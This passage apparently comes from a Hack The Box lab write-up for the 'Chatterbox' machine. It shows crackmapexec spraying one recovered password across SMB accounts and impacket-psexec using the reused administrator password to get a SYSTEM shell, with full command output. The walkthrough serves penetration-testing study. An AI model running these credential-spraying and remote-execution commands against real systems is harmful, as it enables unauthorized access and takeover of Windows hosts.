Password Reuse


┌──(kali㉿kali)-[~/archive/htb/labs/chatterbox]
└─$ crackmapexec smb $IP -u users -p 'Welcome1!' --continue-on-success
smb         10.10.10.74     445    chatterbox       [*] windows 7 professional 7601 service pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
smb         10.10.10.74     445    chatterbox       [+] chatterbox\alfred:Welcome1! 
smb         10.10.10.74     445    chatterbox       [+] chatterbox\administrator:Welcome1! (Pwn3d!)

During the post enumeration phase, I have extracted the cleartext password for thealfred user I was checking through SMB exploitations and came across this.

It turns out that the alfred user is the administrator user This explains how alfred user has FULL control over the home directory of the administrator user

┌──(kali㉿kali)-[~/archive/htb/labs/chatterbox]
└─$ impacket-psexec 'administrator:Welcome1!@$IP' -target-ip $IP                                                                       
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.74.....
[*] Found writable share ADMIN$
[*] Uploading file eNSosfMg.exe
[*] Opening SVCManager on 10.10.10.74.....
[*] Creating service WZal on 10.10.10.74.....
[*] Starting service WZal.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
Chatterbox
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection 4:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.74
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{111d2ff5-ef2c-4d77-b44c-dbce3aaabf4b}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

System Level Compromise